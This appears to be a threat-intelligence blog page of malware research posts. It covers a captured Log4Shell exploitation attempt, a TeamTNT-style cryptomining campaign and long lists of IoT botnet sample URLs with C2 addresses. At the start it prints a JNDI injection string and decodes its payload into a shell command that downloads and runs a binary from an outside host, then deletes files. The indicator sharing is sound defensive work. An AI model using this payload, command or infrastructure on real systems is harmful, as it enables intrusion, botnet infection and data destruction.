admin

Attack info:‘User-Agent’, ‘${jndi:ldap://179.43.175.101:1389/o=tomcat}’Attacker IP: 107.189.29.181 The payload is Base64 encoded: The decoded string is: The payload is a JavaScript code which is executed in Java using the ScripteEngineManager. The shell command is derived using the String.fromCharCode function:java.lang.Runtime.getRuntime().exec(String.fromCharCode(99,100,32,47,116,109,112,59,32,119,103,101,116,32,49,57,56,46,57,56,46,54,48,46,54,55,47,98,105,110,115,47,120,56,54,59,32,99,104,109,111,100,32,55,55,55,32,42,59,32,46,47,120,56,54,32,108,111,103,52,106,59,32,114,109,32,45,114,102,32,42))… The derived string is: cd /tmp; wget 198.98.60.67/bins/x86; chmod 777 *; ./x86 log4j; rm -rf * The downloaded […]

We detected an on-going cryptomining operation which is likely a minor update of the TeamTNT campaign reported by PaloAlto’s Unit 42 in June, which involves TTPs associated with WatchDog. Detailed report on the previous campaign in June: https://unit42.paloaltonetworks.com/teamtnt-cryptojacking-watchdog-operations/ Indicators of Compromise of the currently active operation: XMR Pools:xmr-asia1.nanopool.org:14444xmr.f2pool.com:13531gulf.moneroocean.stream:10001 XMR Wallet: 43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz Files: File Sha256 cronb.sh e20a0566974934e8a8cc44ece0e700963e5542039212117420f7756d89d4e551

In a recent tweet, the malware researcher @0xrb shared a list containing URLs of recently captured IoT botnet samples. Among the links there was an uncommon example, a URL behind a Discord CDN, which as pointed by the IoT malware researcher @_lubiedo, may be difficult to block. Summary: The malware author claims to be doing

URL: hxxp://37.49.230.208:80/Anti_Bins/Antisocial.arm7TCP scanning: 23, 37215, 52869CNC: TCP: 37.49.230.208:5555https://www.virustotal.com/gui/file/31b258676b9414bac1b7d1e49ef4ad1f/detection URL: hxxp://152.89.239.197/x86_64TCP scanning: 2323, 23CNC: TCP: 206.166.251.223:25009https://www.virustotal.com/gui/file/b73ceb52f8ec04f3a89ea524645d1ba0/detectionDNS: ns.cyberium.cc URL: hxxp://37.49.230.196:80/333Sao999Sao666/DAYUMitsKKKAAATTTAAANNNAAA.arm7TCP scanning: 2323, 23CNC: TCP: 37.49.230.196:53547https://www.virustotal.com/gui/file/bb907142b24c1a6aaa28b557baefdbb3/detectionDNS: cnc.destiny2beyondlight.ml URL: hxxp://142.11.242.17:80/SBIDIOT/arm7TCP scanning: 23CNC: TCP: 142.11.242.17:666https://www.virustotal.com/gui/file/dc6db4547dd72eb688ba79e8605de3db/detection URL: hxxp://107.173.176.123:80/bins/UnHAnaAW.x86TCP scanning: 8080, 37215, 80, 2323, 23CNC: TCP: 107.173.176.123:1024https://www.virustotal.com/gui/file/2ee7797e373b57710fd8437b2ade5246/detection URL: hxxp://104.248.120.130:80/beastmode/b3astmode.armTCP scanning: 5501, 37215CNC: TCP: 87.98.143.23:80, 104.248.120.130:34241https://www.virustotal.com/gui/file/ae00a6373156e09728cabcfc4cda372d/detection

URL: hxxp://2.57.122.107:80/lmaoWTF/loligang.x86TCP scanning: 23CNC: TCP: 2.57.122.107:1791https://www.virustotal.com/gui/file/9a3545da771f1855cf3da51167d8c93c/detection URL: hxxp://45.84.196.141:80/files/info.x86TCP scanning: 23CNC: TCP: 45.84.196.141:9506https://www.virustotal.com/gui/file/100ed2a62ddd9ec6096f14b9117b26c2/detection URL: hxxp://172.245.154.151:80/x86TCP scanning:CNC: TCP: 172.245.154.151:1272https://www.virustotal.com/gui/file/6bf9c3ab7e1f8e1ebbbda3e7d8682d23/detection URL: hxxp://45.14.224.170:80/centos2139r209ru120934r123jhr908213jh4r09213/H3LLN3Tx86TCP scanning: 23, 37215CNC: TCP: 45.14.224.170:40666DNS: cnchellnet.duckdns.orghttps://www.virustotal.com/gui/file/0f2f4d29c538c468032a60a606c2b4ba/detection URL: hxxp://37.49.225.116/arm7TCP scanning: 23, 37215CNC: TCP: 37.49.225.116:10001https://www.virustotal.com/gui/file/3573b95be87bee9c3f66056e9cd07cbd/detection URL: hxxp://45.95.168.102/arm7CNC: TCP: 45.61.136.13:25761https://www.virustotal.com/gui/file/3f8565d12803d06e5dfcadb24afc331c/detection URL: hxxp://45.95.168.114:80/SBIDIOT/x86TCP scanning: 23CNC: TCP: 45.95.168.114:666https://www.virustotal.com/gui/file/c36f57d0a4ea105c8cc23314650b4b2b/detection URL: hxxp://37.46.150.64/Pandoras_Box/pandora.arm7TCP scanning: 23CNC: TCP: 37.46.150.64:1791https://www.virustotal.com/gui/file/3cd6a127cd46e050d7c5424937d4669a/detection URL: hxxp://206.126.81.137:80/ch4n010a2a2126/ChanHell.x86TCP scanning: 37215, 23CNC: TCP: 206.126.81.107:48529https://www.virustotal.com/gui/file/b60c0bead153982539fefaae5b32702b/detection

URL: hxxp://45.95.168.156:80/bins/Hilix.x86TCP scanning: 37215, 23, 52869CNC: 45.95.168.156:45https://www.virustotal.com/gui/file/4b6bb12f19c0952af041148e1378c0fc/detection URL: hxxp://37.49.224.209:80/arm7CNC: 37.49.224.209:5959https://www.virustotal.com/gui/file/c98713fa1be1f7b1ab2a0b325c9dd92c/detection URL: hxxp://172.245.8.9:80/bins/vcimanagement.x86TCP scanning: 80, 37215, 8080, 2323, 23CNC: 172.245.8.9:3884https://www.virustotal.com/gui/file/8622a79f8fd279945074e3322f4619c4/detection URL: hxxp://45.95.169.1:80/x86CNC: 45.95.169.1:5959https://www.virustotal.com/gui/file/b72e7857b7fedf7d6c962da17ea012ad/detection URL: hxxp://37.49.224.218:80/bins/xxx.arm7TCP scanning: 80, 37215, 8080, 2323, 23CNC: 45.143.220.246:1027https://www.virustotal.com/gui/file/8c35339cd030daa159e7cbffa83ac22e/detection

URL: hxxp://37.49.226.221:80/SBIDIOT/arm7C2: 37.49.226.221:6969https://www.virustotal.com/gui/file/31cdb290056ccabca8d82176cbfb7b52/detection URL: hxxp://64.227.57.139:80/lmaoWTF/loligang.x86TCP scanning: 23C2: 64.227.57.139:1791https://www.virustotal.com/gui/file/8b9eddbf2b90f15ad2b224b22fd8bc45/detection URL: hxxp://192.236.146.53/le.bot.arm7TCP scanning: 23, 2323C2: 192.236.146.53:4708https://www.virustotal.com/gui/file/593e30dc2349334691e964a3934040ce/detection URL: hxxp://45.95.168.169:80/beastmode/b3astmode.arm7TCP scanning: 23C2: 45.95.168.169:65508https://www.virustotal.com/gui/file/28323e9d1fa9dad0b07710aeab3f2be2/detection URL: hxxp://37.49.230.160:80/bins/jKira.arm7TCP scanning: 37215https://www.virustotal.com/gui/file/cfd9ee5b7dc7a79270565ef6a3351802/detection URL: hxxp://37.49.226.35:80/SBIDIOT/arm7TCP scanning: 23C2: 37.49.226.35:2074https://www.virustotal.com/gui/file/6df592143855b39753708ae44ddd8543/detection URL: hxxp://23.254.209.220:80/Tnxl_Bins/Tnxl.x86TCP scanning: 52869, 23, 37215C2: 23.254.209.220:17012https://www.virustotal.com/gui/file/d7bf73af57300a78a18d942a6a915506/detection

URL: http://45.135.134.190:80/Pandoras_Box/pandora.x86TCP scanning: 23CNC: 45.135.134.190:1791https://www.virustotal.com/gui/file/5a7fd559adc15c89086592427b8b8d2c/detection URL: http://159.89.150.193:80/SBIDIOT/x86TCP scanning: 23CNC: 159.89.150.193:666https://www.virustotal.com/gui/file/9d08d96c6aa72932a0cc2e449c82fae8/detection URL: http://192.236.160.162:80/0xxx0xxxasdajshdsajhkgdja/Sa0aS.x86TCP scanning: 37215, 23CNC: 192.236.160.162:58666https://www.virustotal.com/gui/file/b55f2f5c805b04858ae7fad8ac137d42/detectionDNS: saoascnc.duckdns.orgDDOS: UDP:117.27.239.28:multiple URL: http://45.95.168.81:80/bins/Hilix.arm7TCP scanning: 23, 37215, 52869CNC: 45.95.168.81:45https://www.virustotal.com/gui/file/fdd8089262c3bbc4216085cf5a235c6c/detection URL: http://45.32.179.8:80/Corret/C0rret.arm7TCP scanning: 23CNC: 45.32.179.8:9375https://www.virustotal.com/gui/file/91b8be51f982cad32050265ad9795c8e/detection URL: http://80.211.239.70:80/lmaoWTF/loligang.x86TCP scanning: 23CNC: TCPhttps://www.virustotal.com/gui/file/fd1c236ef8051b3e11d4f9c45cf2f37e/detection URL: http://96.30.193.26:80/x86TCP scanning: 8089, 80CNC: 96.30.193.26:443https://www.virustotal.com/gui/file/76bb394c91b530311c830e5559ca0e99/detection URL: http://185.172.110.241:80/nope/daddyscum.arm7TCP scanning:CNC:https://www.virustotal.com/gui/file/35509e2c5a70cfc114222cb63d5a720a/detection URL: http://172.245.52.231:80/x0ox0ox0oxDefault/z0r0.x86TCP scanning: 80, 37215, 23CNC: 172.245.52.231:59666https://www.virustotal.com/gui/file/1ce7ad62f9a5414f9101c8e6d25a6eba/detectionDNS: cnc.luxstresser.xyz URL: http://82.118.242.107:80/iotbins/110v3107n37.x86TCP scanning:

URL: http://142.93.197.100:80/bins/Hilix.x86TCP scanning: 23, 37215, 52869CNC: TCP: 142.93.197.100:45https://www.virustotal.com/gui/file/a89335c965355e33e10c8f779a00a7d5/detection URL: http://45.14.224.22:80/bins/Solstice.x86TCP scanning: 80, 52869, 37215CNC: TCP: 45.14.224.22:21795https://www.virustotal.com/gui/file/f53749eaeea48dc1720cfca6f5b4e932/detection URL: http://104.238.235.186:80/bins/911.x86TCP scanning: 37215CNC: TCP: 104.238.235.186:5034https://www.virustotal.com/gui/file/06a6abf63963606a28d5fb1e4bedc72d/detection URL: http://165.227.51.77:80/SBIDIOT/arm7TCP scanning: 23CNC: TCP: 165.227.51.77:666https://www.virustotal.com/gui/file/c6dcbd3557fe11841599427da833d63c/detection

URL: http://80.211.230.27:80/a.arm7 TCP scanning: 26 CNC: TCP: 172.86.75.173:6909 https://www.virustotal.com/gui/file/bd658214918e4228f4ed07875d4830f3/detection URL: http://80.211.230.27:80/a.x86 TCP scanning: 26 CNC: TCP: 172.86.75.173:6909 https://www.virustotal.com/gui/file/8a7dafd2218ccdfa511e94f3e6dc9a59/detection URL: http://185.172.110.232:80/nope/daddyscum.x86 TCP scanning: 23, 37215 CNC: TCP: 192.236.155.159:7498 https://www.virustotal.com/gui/file/2398c7305b819ef61411eac52463f862/detection URL: http://134.122.112.236:80/bins/Hilix.arm7 TCP scanning: 37215, 23, 52869 CNC: TCP: 134.122.112.236:45 https://www.virustotal.com/gui/file/8b8e4fb04a87013b153f683b1149dd3c/detection URL: http://134.122.112.236:80/bins/Hilix.x86 TCP scanning: 37215, 23, 52869 CNC: TCP: 134.122.112.236:45 https://www.virustotal.com/gui/file/26a9dce3e8d3a6fa963e1cc101b60a36/detection URL: http://67.207.93.206:80/GraveDigger/rapethemipcams.arm7 TCP scanning: 23